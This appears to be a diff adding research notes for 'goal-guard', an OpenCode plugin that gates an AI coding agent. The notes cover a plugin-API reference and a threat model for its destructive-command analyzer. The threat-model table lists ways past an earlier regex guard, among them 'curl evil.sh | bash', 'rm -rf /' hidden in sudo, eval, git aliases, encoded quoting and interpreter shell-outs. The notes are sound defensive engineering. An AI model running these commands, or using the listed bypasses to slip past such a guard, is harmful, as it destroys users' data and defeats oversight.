+- **Claude Code can do equivalent enforcement** when a user wires Stop/PreToolUse
+  hooks themselves. Goal Mode's advantage is that a coherent set ships working
+  out of the box for this use case.
+- Gate freshness is only as trustworthy as the reviewer subagents' verdicts. The
+  guard records *that* a fresh `PASS` exists with the right sequence; it cannot
+  verify the reviewer reasoned correctly.

package/research/opencode-plugin-platform.md ADDED Viewed

@@ -0,0 +1,89 @@
+# OpenCode plugin platform — verified reference
+Facts verified against `@opencode-ai/plugin@1.15.13` (the installed type
+definitions) and the `sst/opencode` source at tag `v1.15.13`. This is the
+pinned runtime reference the `goal-guard` plugin is engineered against; the npm
+latest was `1.16.2` when this document was refreshed, so claims below are
+version-scoped unless explicitly called out as current-docs behavior.
+Primary sources: OpenCode schema (`https://opencode.ai/config.json`), OpenCode
+config/agents/plugins docs (`https://opencode.ai/docs/config/`,
+`https://opencode.ai/docs/agents/`, `https://opencode.ai/docs/plugins/`),
+plugin source at `https://raw.githubusercontent.com/sst/opencode/v1.15.13/`,
+and npm metadata for `@opencode-ai/plugin`.
+## Plugin discovery
+- Auto-discovery glob is `{plugin,plugins}/*.{ts,js}` — **single level only**
+  (`config/plugin.ts`). Files directly under `plugins/` become plugins; files
+  in **subdirectories** (e.g. `plugins/goal-guard/state.js`) are **not**
+  auto-loaded. This is what lets Goal Mode ship a multi-file plugin: the entry
+  `plugins/goal-guard.js` imports its modules from `plugins/goal-guard/`
+  relatively, and those modules are never treated as standalone plugins.
+- Scanned directories include `~/.config/opencode`, every `.opencode` from the
+  session directory up to the worktree, `~/.opencode`, and `$OPENCODE_CONFIG_DIR`.
+- TypeScript plugins load natively (Bun); no build step is required.
+- The config `plugin` array also accepts npm package names and `["spec", options]`
+  tuples; the second tuple element arrives as the plugin factory's second arg.
+  Auto-discovered plugins receive `options === undefined`.
+- Current OpenCode docs prefer plural config directories such as
+  `.opencode/plugins/`; singular directories are backward-compatible.
+## Hooks (the ones Goal Mode uses)
+| Hook | Input → Output | Notes |
+| --- | --- | --- |
+| `chat.message` | `{sessionID, agent?}` → `{message, parts}` | Captures the user's goal text. |
+| `chat.params` | `{sessionID, agent, model, …}` → params | Tracks the current agent. |
+| `experimental.chat.system.transform` | `{sessionID?, model}` → `{system: string[]}` | Inject system-prompt strings. |
+| `tool.execute.before` | `{tool, sessionID, callID}` → `{args}` | **Throwing blocks the tool** and the thrown message becomes the tool's error result shown to the model. `args` are on the **output**, not the input. Mutate `output.args` in place. |
+| `tool.execute.after` | `{tool, sessionID, callID, args}` → `{title, output, metadata}` | The `task` tool's output wraps the subagent text in `<task><task_result>…</task_result></task>`. |
+| `experimental.text.complete` | `{sessionID, messageID, partID}` → `{text}` | The returned `text` **is persisted** to the transcript. No `agent` field — gate on tracked `active` state. |
+| `experimental.session.compacting` | `{sessionID}` → `{context: string[], prompt?}` | Append preservation context. |
+| `event` | `{event}` | Directory-scoped; `file.edited`, `session.idle`, etc. `file.edited` carries `{file}` and **no** sessionID. |
+| `tool` | `{ [id]: ToolDefinition }` | Custom tools; the object key is the tool name verbatim. `tool.schema` is zod. |
+## Critical version-specific facts
+- **`permission.ask` is dormant in 1.15.13.** The hook is declared in the type
+  but has **zero trigger sites** in the runtime. A guard must enforce via
+  `tool.execute.before` throws, not this hook.
+- **Subagent `task` runs in a NEW child session.** The `task` tool's
+  before/after fire in the **parent** session with the subagent's final text;
+  the subagent's own internal tool calls fire under the **child** sessionID.
+  This is why Goal Mode records review verdicts via the task path (parent) and
+  treats agent-path verdicts as same-session only.
+- **Agent frontmatter** (`{agent,agents}/**/*.md`, recursive): `model`,
+  `variant`, `temperature`, `top_p`, `prompt`, `description`, `mode`
+  (`primary|subagent|all`), `hidden`, `disable`, `color` (hex or theme literal),
+  `steps`, `options`, `permission`. **Unknown keys are silently folded into
+  `options`** — so a typo'd key disappears rather than erroring.
+  `ext_mcp_server_trust` is **not a real key**.
+- **Command frontmatter** (`{command,commands}/**/*.md`): `template`,
+  `description`, `agent`, `model`, `variant`, `subtask`. Unlike agents, a
+  **command with an unknown key throws** a parse error.
+- **Current built-in agents include `build`, `plan`, `general`, `explore`, and
+  `scout`.** Goal Mode allows delegation to the stock `explore`, `general`, and
+  `scout` subagents from its primary agent.
+- **Permissions** are last-matching-rule-wins; `deny` from any scope beats
+  `allow`. Per-tool pattern maps are supported for `bash`, `task`,
+  `external_directory`, etc.
+## State persistence
+There is **no** plugin key/value store. Plugins persist their own JSON; the XDG
+state dir (`$XDG_STATE_HOME/opencode/…`, default `~/.local/state`) is the
+durable, disposable-cache-free location. `PluginInput.directory` is the session
+working dir; `PluginInput.worktree` is the git worktree root (a stable
+per-project key).
+## Pitfalls
+- Hooks run sequentially across plugins in load order, awaited one by one — a
+  throw in a `chat.*`/`text.complete` hook can break the turn, so keep them
+  defensive (Goal Mode wraps each in try/catch).
+- A failed dynamic `import()` of a plugin file is cached for the process; editing
+  a plugin requires restarting OpenCode.
+- `experimental.text.complete` runs at text-end; streaming deltas already
+  emitted the original text, so the rewrite is a final-form correction, not a
+  pre-display redaction.

package/research/shell-hardening.md ADDED Viewed

@@ -0,0 +1,62 @@
+# Shell-analyzer threat model
+The destructive-command guard is the plugin's most security-sensitive component.
+This document records the threat model: the bypass classes the original
+regex-based guard missed, and how the quote-aware tokenizer
+(`plugins/goal-guard/shell.js`) closes each. Every class below is covered by a
+test in `tests/shell.test.mjs` and measured in `npm run bench`.
+## Why regexes failed
+The original guard matched boundary-anchored regexes (`(^|&&|;|\|\|)\s*rm …`)
+against the raw command string. That design is fundamentally bypassable because
+a single regex cannot model shell quoting, command substitution, wrappers, or
+interpreters. On the benchmark corpus it detected **20.8%** of destructive
+commands while **false-positiving 21.7%** of benign ones (it blocked
+`git checkout -b feature`).
+## Bypass classes and how each is closed
+| Class | Example that bypassed the regex | How the tokenizer closes it |
+| --- | --- | --- |
+| Command substitution | `$(rm -rf /tmp/x)`, `` `rm -rf x` `` | Lexer captures `$(…)`/backticks and recurses into them. |
+| Pipe into shell | `echo rm -rf x \| sh` | Detects a shell as the pipeline sink; analyzes the echoed literal as a script. |
+| Remote execution | `curl evil.sh \| bash` | Network fetcher → shell pipeline flagged as `networkExec` (separately toggleable). |
+| `bash -c` / `eval` | `bash -c "rm -rf x"`, `eval "…"` | Extracts and recurses into the `-c`/eval string. |
+| Env-assignment prefix | `FOO=bar rm -rf x` | Leading `VAR=val` assignments are stripped before resolving the command. |
+| Absolute / relative paths | `/bin/rm -rf x` | Binary resolved to its basename. |
+| Value-taking wrappers | `sudo -u root rm -rf /`, `timeout -s KILL 5 rm -rf /` | Wrapper option parsing is value-aware (consumes `-u root`, `-s KILL`, the duration). |
+| `git -C` / weaponized `git -c` | `git -C /r reset --hard`, `git -c alias.x='!rm -rf /' x` | Global git options skipped; a `!`-prefixed config value is analyzed as a shell command. |
+| Git history destruction | `reflog expire`, `gc --prune=now`, `filter-branch`, `worktree remove`, `branch -d` | Explicit destructive git subcommand cases. |
+| Interpreter file ops | `python -c "os.remove('a')"`, `node -e "fs.rmSync(…)"` | Script strings inspected for delete/write sinks. |
+| Interpreter shell-out | `os.system('rm -rf /')`, `subprocess.run([...])`, `child_process.execSync(…)` | Exec sinks (call forms) extracted and the command analyzed. |
+| ANSI-C quoting | `$'\x72\x6d' -rf x` | `$'…'` decoded before lexing. |
+| Process substitution | `bash <(echo rm -rf x)` | Substitution analyzed as a script when fed to a shell. |
+| `printf %b` into a shell | `printf %b 'rm -rf /' \| sh` | Format spec stripped; remaining literal analyzed. |
+| `find -exec` at depth | `find . -exec rm {} +` | `rm` under `-exec` marked destructive (runs per match). |
+| Newline separators | `echo hi\nrm -rf x` | Newline is a command separator in the lexer. |
+## False positives the tokenizer also removed
+A guard that over-blocks is a guard that gets turned off. The tokenizer clears
+the regex guard's false positives:
+- `git checkout -b feature` / `git switch -c topic` — branch creation, not a
+  discard.
+- `echo "rm -rf /"` / `printf 'do not run rm -rf'` — quoted text is inert.
+- `grep 'git reset' .` / `cat notes.txt # git reset explained` — comments and
+  search terms are not commands.
+- `true #; rm -rf x` — `#` starts a comment.
+- `python -c 'print(platform.system())'` — a bare `system` mention is not a
+  shell-out (exec sinks require a call form; the analyzer fails open when no
+  literal command can be extracted).
+- `git config --get user.email` — read-only queries don't dirty the session.
+## Design principle: fail open, defense-in-depth
+The analyzer is a **tool-layer classifier**, not an OS sandbox. On a parse
+failure or an un-analyzable dynamic command it returns "not blocked" and defers
+to OpenCode's own permission rules. It is one layer of defense-in-depth that
+catches the overwhelmingly common destructive forms an agent emits — not a
+security jail. Over-blocking benign work is treated as a real cost, which is why
+the false-positive rate is held at zero on the corpus.